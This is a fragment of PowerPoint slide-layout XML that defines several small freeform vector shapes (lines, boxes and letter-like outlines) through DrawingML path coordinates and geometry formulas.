                      <a:cubicBezTo>
                        <a:pt x="57" y="38"/>
                        <a:pt x="61" y="34"/>
                        <a:pt x="61" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="26"/>
                        <a:pt x="57" y="23"/>
                        <a:pt x="5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7"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8647113" y="4972051"/>
                  <a:ext cx="149225" cy="120650"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 48 w 94"/>
                    <a:gd name="T1" fmla="*/ 68 h 76"/>
                    <a:gd name="T2" fmla="*/ 44 w 94"/>
                    <a:gd name="T3" fmla="*/ 62 h 76"/>
                    <a:gd name="T4" fmla="*/ 14 w 94"/>
                    <a:gd name="T5" fmla="*/ 62 h 76"/>
                    <a:gd name="T6" fmla="*/ 14 w 94"/>
                    <a:gd name="T7" fmla="*/ 58 h 76"/>
                    <a:gd name="T8" fmla="*/ 14 w 94"/>
                    <a:gd name="T9" fmla="*/ 33 h 76"/>
                    <a:gd name="T10" fmla="*/ 9 w 94"/>
                    <a:gd name="T11" fmla="*/ 27 h 76"/>
                    <a:gd name="T12" fmla="*/ 6 w 94"/>
                    <a:gd name="T13" fmla="*/ 27 h 76"/>
                    <a:gd name="T14" fmla="*/ 6 w 94"/>
                    <a:gd name="T15" fmla="*/ 6 h 76"/>
                    <a:gd name="T16" fmla="*/ 0 w 94"/>
                    <a:gd name="T17" fmla="*/ 0 h 76"/>
                    <a:gd name="T18" fmla="*/ 0 w 94"/>
                    <a:gd name="T19" fmla="*/ 58 h 76"/>
                    <a:gd name="T20" fmla="*/ 0 w 94"/>
                    <a:gd name="T21" fmla="*/ 62 h 76"/>
                    <a:gd name="T22" fmla="*/ 11 w 94"/>
                    <a:gd name="T23" fmla="*/ 76 h 76"/>
                    <a:gd name="T24" fmla="*/ 14 w 94"/>
                    <a:gd name="T25" fmla="*/ 76 h 76"/>
                    <a:gd name="T26" fmla="*/ 24 w 94"/>
                    <a:gd name="T27" fmla="*/ 76 h 76"/>
                    <a:gd name="T28" fmla="*/ 48 w 94"/>
                    <a:gd name="T29" fmla="*/ 76 h 76"/>
                    <a:gd name="T30" fmla="*/ 94 w 94"/>
                    <a:gd name="T31" fmla="*/ 76 h 76"/>
                    <a:gd name="T32" fmla="*/ 82 w 94"/>
                    <a:gd name="T33" fmla="*/ 68 h 76"/>
                    <a:gd name="T34" fmla="*/ 48 w 94"/>
                    <a:gd name="T35"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 h="76">
                      <a:moveTo>
                        <a:pt x="48" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="44" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="33"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4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8"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9158288" y="4352926"/>
                  <a:ext cx="98425" cy="98425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 62"/>
                    <a:gd name="T1" fmla="*/ 0 h 62"/>
                    <a:gd name="T2" fmla="*/ 23 w 62"/>
                    <a:gd name="T3" fmla="*/ 0 h 62"/>
                    <a:gd name="T4" fmla="*/ 0 w 62"/>
                    <a:gd name="T5" fmla="*/ 0 h 62"/>
                    <a:gd name="T6" fmla="*/ 4 w 62"/>
                    <a:gd name="T7" fmla="*/ 5 h 62"/>
                    <a:gd name="T8" fmla="*/ 23 w 62"/>
                    <a:gd name="T9" fmla="*/ 5 h 62"/>
                    <a:gd name="T10" fmla="*/ 29 w 62"/>
                    <a:gd name="T11" fmla="*/ 11 h 62"/>
                    <a:gd name="T12" fmla="*/ 57 w 62"/>
                    <a:gd name="T13" fmla="*/ 11 h 62"/>
                    <a:gd name="T14" fmla="*/ 57 w 62"/>
                    <a:gd name="T15" fmla="*/ 57 h 62"/>
                    <a:gd name="T16" fmla="*/ 62 w 62"/>
                    <a:gd name="T17" fmla="*/ 62 h 62"/>
                    <a:gd name="T18" fmla="*/ 62 w 62"/>
                    <a:gd name="T19" fmla="*/ 11 h 62"/>
                    <a:gd name="T20" fmla="*/ 62 w 62"/>
                    <a:gd name="T21" fmla="*/ 5 h 62"/>
                    <a:gd name="T22" fmla="*/ 62 w 62"/>
                    <a:gd name="T23" fmla="*/ 0 h 62"/>
                    <a:gd name="T24" fmla="*/ 57 w 62"/>
                    <a:gd name="T2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2">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="23" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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9"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8650288" y="4356101"/>
                  <a:ext cx="604838" cy="733425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 381 w 381"/>
                    <a:gd name="T1" fmla="*/ 462 h 462"/>
                    <a:gd name="T2" fmla="*/ 14 w 381"/>
                    <a:gd name="T3" fmla="*/ 462 h 462"/>
                    <a:gd name="T4" fmla="*/ 14 w 381"/>
                    <a:gd name="T5" fmla="*/ 461 h 462"/>
                    <a:gd name="T6" fmla="*/ 378 w 381"/>
                    <a:gd name="T7" fmla="*/ 461 h 462"/>
                    <a:gd name="T8" fmla="*/ 378 w 381"/>
                    <a:gd name="T9" fmla="*/ 3 h 462"/>
                    <a:gd name="T10" fmla="*/ 1 w 381"/>
                    <a:gd name="T11" fmla="*/ 3 h 462"/>
                    <a:gd name="T12" fmla="*/ 1 w 381"/>
                    <a:gd name="T13" fmla="*/ 449 h 462"/>
                    <a:gd name="T14" fmla="*/ 0 w 381"/>
                    <a:gd name="T15" fmla="*/ 449 h 462"/>
                    <a:gd name="T16" fmla="*/ 0 w 381"/>
                    <a:gd name="T17" fmla="*/ 0 h 462"/>
                    <a:gd name="T18" fmla="*/ 381 w 381"/>
                    <a:gd name="T19" fmla="*/ 0 h 462"/>
                    <a:gd name="T20" fmla="*/ 381 w 381"/>
                    <a:gd name="T21" fmla="*/ 46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1" h="462">
                      <a:moveTo>
                        <a:pt x="381" y="462"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="462"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="449"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="449"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="381" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="381" y="4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80"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8650288" y="4356101"/>
                  <a:ext cx="55563" cy="57150"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 35"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 0 w 35"/>
                    <a:gd name="T3" fmla="*/ 36 h 36"/>
                    <a:gd name="T4" fmla="*/ 0 w 35"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 35 w 35"/>
                    <a:gd name="T7" fmla="*/ 0 h 36"/>
                    <a:gd name="T8" fmla="*/ 35 w 35"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 1 w 35"/>
                    <a:gd name="T11" fmla="*/ 33 h 36"/>
                    <a:gd name="T12" fmla="*/ 32 w 35"/>
                    <a:gd name="T13" fmla="*/ 33 h 36"/>
                    <a:gd name="T14" fmla="*/ 32 w 35"/>
                    <a:gd name="T15" fmla="*/ 3 h 36"/>
                    <a:gd name="T16" fmla="*/ 1 w 35"/>
                    <a:gd name="T17" fmla="*/ 3 h 36"/>
                    <a:gd name="T18" fmla="*/ 1 w 35"/>
                    <a:gd name="T19"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6">
                      <a:moveTo>
                        <a:pt x="35" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="36"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="33"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="33"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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81"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8910638" y="5027613"/>
                  <a:ext cx="341313" cy="61913"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 215"/>
                    <a:gd name="T1" fmla="*/ 39 h 39"/>
                    <a:gd name="T2" fmla="*/ 0 w 215"/>
                    <a:gd name="T3" fmla="*/ 38 h 39"/>
                    <a:gd name="T4" fmla="*/ 37 w 215"/>
                    <a:gd name="T5" fmla="*/ 0 h 39"/>
                    <a:gd name="T6" fmla="*/ 215 w 215"/>
                    <a:gd name="T7" fmla="*/ 0 h 39"/>
                    <a:gd name="T8" fmla="*/ 215 w 215"/>
                    <a:gd name="T9" fmla="*/ 3 h 39"/>
                    <a:gd name="T10" fmla="*/ 38 w 215"/>
                    <a:gd name="T11" fmla="*/ 3 h 39"/>
                    <a:gd name="T12" fmla="*/ 2 w 215"/>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215" h="39">
                      <a:moveTo>
                        <a:pt x="2" y="39"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="38"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="215" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2"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82"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8945563" y="5045076"/>
                  <a:ext cx="306388" cy="44450"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 193"/>
                    <a:gd name="T1" fmla="*/ 28 h 28"/>
                    <a:gd name="T2" fmla="*/ 0 w 193"/>
                    <a:gd name="T3" fmla="*/ 27 h 28"/>
                    <a:gd name="T4" fmla="*/ 26 w 193"/>
                    <a:gd name="T5" fmla="*/ 0 h 28"/>
                    <a:gd name="T6" fmla="*/ 193 w 193"/>
                    <a:gd name="T7" fmla="*/ 0 h 28"/>
                    <a:gd name="T8" fmla="*/ 193 w 193"/>
                    <a:gd name="T9" fmla="*/ 3 h 28"/>
                    <a:gd name="T10" fmla="*/ 28 w 193"/>
                    <a:gd name="T11" fmla="*/ 3 h 28"/>
                    <a:gd name="T12" fmla="*/ 2 w 193"/>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193" h="28">
                      <a:moveTo>
                        <a:pt x="2" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="193" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="193" y="3"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="3"/>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83"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8770938" y="4746626"/>
                  <a:ext cx="38100" cy="50800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 24"/>
                    <a:gd name="T1" fmla="*/ 32 h 32"/>
                    <a:gd name="T2" fmla="*/ 0 w 24"/>
                    <a:gd name="T3" fmla="*/ 0 h 32"/>
                    <a:gd name="T4" fmla="*/ 0 w 24"/>
                    <a:gd name="T5" fmla="*/ 0 h 32"/>
                    <a:gd name="T6" fmla="*/ 21 w 24"/>
                    <a:gd name="T7" fmla="*/ 24 h 32"/>
                    <a:gd name="T8" fmla="*/ 21 w 24"/>
                    <a:gd name="T9" fmla="*/ 0 h 32"/>
                    <a:gd name="T10" fmla="*/ 24 w 24"/>
                    <a:gd name="T11" fmla="*/ 0 h 32"/>
                    <a:gd name="T12" fmla="*/ 24 w 24"/>
                    <a:gd name="T13" fmla="*/ 32 h 32"/>
                    <a:gd name="T14" fmla="*/ 23 w 24"/>
                    <a:gd name="T15" fmla="*/ 32 h 32"/>
                    <a:gd name="T16" fmla="*/ 2 w 24"/>
                    <a:gd name="T17" fmla="*/ 8 h 32"/>
                    <a:gd name="T18" fmla="*/ 2 w 24"/>
                    <a:gd name="T19" fmla="*/ 32 h 32"/>
                    <a:gd name="T20" fmla="*/ 0 w 24"/>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32">
                      <a:moveTo>
                        <a:pt x="0" y="32"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="8"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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84"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8818563" y="4745038"/>
                  <a:ext cx="53975" cy="52388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 23"/>
                    <a:gd name="T1" fmla="*/ 0 h 23"/>
                    <a:gd name="T2" fmla="*/ 20 w 23"/>
                    <a:gd name="T3" fmla="*/ 3 h 23"/>
                    <a:gd name="T4" fmla="*/ 23 w 23"/>
                    <a:gd name="T5" fmla="*/ 12 h 23"/>
                    <a:gd name="T6" fmla="*/ 20 w 23"/>
                    <a:gd name="T7" fmla="*/ 20 h 23"/>
                    <a:gd name="T8" fmla="*/ 12 w 23"/>
                    <a:gd name="T9" fmla="*/ 23 h 23"/>
                    <a:gd name="T10" fmla="*/ 3 w 23"/>
                    <a:gd name="T11" fmla="*/ 20 h 23"/>
                    <a:gd name="T12" fmla="*/ 0 w 23"/>
                    <a:gd name="T13" fmla="*/ 12 h 23"/>
                    <a:gd name="T14" fmla="*/ 2 w 23"/>
                    <a:gd name="T15" fmla="*/ 6 h 23"/>
                    <a:gd name="T16" fmla="*/ 6 w 23"/>
                    <a:gd name="T17" fmla="*/ 2 h 23"/>
                    <a:gd name="T18" fmla="*/ 11 w 23"/>
                    <a:gd name="T19" fmla="*/ 0 h 23"/>
                    <a:gd name="T20" fmla="*/ 12 w 23"/>
                    <a:gd name="T21" fmla="*/ 2 h 23"/>
                    <a:gd name="T22" fmla="*/ 7 w 23"/>
                    <a:gd name="T23" fmla="*/ 4 h 23"/>
                    <a:gd name="T24" fmla="*/ 4 w 23"/>
                    <a:gd name="T25" fmla="*/ 7 h 23"/>
                    <a:gd name="T26" fmla="*/ 2 w 23"/>
                    <a:gd name="T27" fmla="*/ 12 h 23"/>
                    <a:gd name="T28" fmla="*/ 5 w 23"/>
                    <a:gd name="T29" fmla="*/ 18 h 23"/>
                    <a:gd name="T30" fmla="*/ 12 w 23"/>
                    <a:gd name="T31" fmla="*/ 21 h 23"/>
                    <a:gd name="T32" fmla="*/ 16 w 23"/>
                    <a:gd name="T33" fmla="*/ 20 h 23"/>
                    <a:gd name="T34" fmla="*/ 20 w 23"/>
                    <a:gd name="T35" fmla="*/ 16 h 23"/>
                    <a:gd name="T36" fmla="*/ 21 w 23"/>
                    <a:gd name="T37" fmla="*/ 12 h 23"/>
                    <a:gd name="T38" fmla="*/ 20 w 23"/>
                    <a:gd name="T39" fmla="*/ 7 h 23"/>
                    <a:gd name="T40" fmla="*/ 16 w 23"/>
                    <a:gd name="T41" fmla="*/ 4 h 23"/>
                    <a:gd name="T42" fmla="*/ 12 w 23"/>
                    <a:gd name="T43"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23">
                      <a:moveTo>
                        <a:pt x="11" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="0"/>
                        <a:pt x="18" y="1"/>
                        <a:pt x="20" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="6"/>
                        <a:pt x="23" y="8"/>
                        <a:pt x="23" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="15"/>
                        <a:pt x="22" y="18"/>
                        <a:pt x="20" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="22"/>
                        <a:pt x="15" y="23"/>
                        <a:pt x="12" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="23"/>
                        <a:pt x="6" y="22"/>
                        <a:pt x="3" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="18"/>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="2" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="4"/>
                        <a:pt x="4" y="3"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="1"/>
                        <a:pt x="9" y="0"/>
                        <a:pt x="11" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="4"/>
                        <a:pt x="4" y="6"/>
                        <a:pt x="4" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="8"/>
                        <a:pt x="2" y="10"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="14"/>
                        <a:pt x="3" y="17"/>
                        <a:pt x="5" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="20"/>
                        <a:pt x="9" y="21"/>
                        <a:pt x="12" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="21"/>
                        <a:pt x="15" y="21"/>
                        <a:pt x="16" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="19"/>
                        <a:pt x="19" y="18"/>
                        <a:pt x="20" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="15"/>
                        <a:pt x="21" y="13"/>
                        <a:pt x="21" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="10"/>
                        <a:pt x="20" y="8"/>
                        <a:pt x="20" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="18" y="4"/>
                        <a:pt x="16" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="13" y="2"/>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85"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8901113" y="4746626"/>
                  <a:ext cx="33338" cy="50800"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 14"/>
                    <a:gd name="T1" fmla="*/ 0 h 22"/>
                    <a:gd name="T2" fmla="*/ 4 w 14"/>
                    <a:gd name="T3" fmla="*/ 0 h 22"/>
                    <a:gd name="T4" fmla="*/ 9 w 14"/>
                    <a:gd name="T5" fmla="*/ 0 h 22"/>
                    <a:gd name="T6" fmla="*/ 12 w 14"/>
                    <a:gd name="T7" fmla="*/ 2 h 22"/>
                    <a:gd name="T8" fmla="*/ 14 w 14"/>
                    <a:gd name="T9" fmla="*/ 6 h 22"/>
                    <a:gd name="T10" fmla="*/ 12 w 14"/>
                    <a:gd name="T11" fmla="*/ 9 h 22"/>
                    <a:gd name="T12" fmla="*/ 9 w 14"/>
                    <a:gd name="T13" fmla="*/ 11 h 22"/>
                    <a:gd name="T14" fmla="*/ 4 w 14"/>
                    <a:gd name="T15" fmla="*/ 11 h 22"/>
                    <a:gd name="T16" fmla="*/ 2 w 14"/>
                    <a:gd name="T17" fmla="*/ 11 h 22"/>
                    <a:gd name="T18" fmla="*/ 2 w 14"/>
                    <a:gd name="T19" fmla="*/ 22 h 22"/>
                    <a:gd name="T20" fmla="*/ 0 w 14"/>
                    <a:gd name="T21" fmla="*/ 22 h 22"/>
                    <a:gd name="T22" fmla="*/ 0 w 14"/>
                    <a:gd name="T23" fmla="*/ 0 h 22"/>
                    <a:gd name="T24" fmla="*/ 2 w 14"/>
                    <a:gd name="T25" fmla="*/ 2 h 22"/>
                    <a:gd name="T26" fmla="*/ 2 w 14"/>
                    <a:gd name="T27" fmla="*/ 9 h 22"/>
                    <a:gd name="T28" fmla="*/ 6 w 14"/>
                    <a:gd name="T29" fmla="*/ 9 h 22"/>
                    <a:gd name="T30" fmla="*/ 9 w 14"/>
                    <a:gd name="T31" fmla="*/ 9 h 22"/>
                    <a:gd name="T32" fmla="*/ 11 w 14"/>
                    <a:gd name="T33" fmla="*/ 8 h 22"/>
                    <a:gd name="T34" fmla="*/ 11 w 14"/>
                    <a:gd name="T35" fmla="*/ 6 h 22"/>
                    <a:gd name="T36" fmla="*/ 11 w 14"/>
                    <a:gd name="T37" fmla="*/ 4 h 22"/>
                    <a:gd name="T38" fmla="*/ 9 w 14"/>
                    <a:gd name="T39" fmla="*/ 2 h 22"/>
                    <a:gd name="T40" fmla="*/ 6 w 14"/>
                    <a:gd name="T41" fmla="*/ 2 h 22"/>
                    <a:gd name="T42" fmla="*/ 2 w 14"/>
                    <a:gd name="T43"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22">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="0"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="4" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="12" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="14" y="4"/>
                        <a:pt x="14" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="7"/>
                        <a:pt x="13" y="8"/>
                        <a:pt x="12" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="10"/>
                        <a:pt x="11" y="11"/>
                        <a:pt x="9" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="11"/>
                        <a:pt x="6" y="11"/>
                        <a:pt x="4" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="22"/>
                        <a:pt x="2" y="22"/>
                        <a:pt x="2" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="0" y="22"/>
                        <a:pt x="0" y="22"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="6" y="9"/>
                        <a:pt x="6" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="9"/>
                        <a:pt x="8" y="9"/>
                        <a:pt x="9" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="9"/>
                        <a:pt x="10" y="8"/>
                        <a:pt x="11" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="7"/>
                        <a:pt x="11" y="6"/>
                        <a:pt x="11" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="5"/>
                        <a:pt x="11" y="4"/>
                        <a:pt x="11" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="3"/>
                        <a:pt x="10" y="2"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="2"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>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86"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
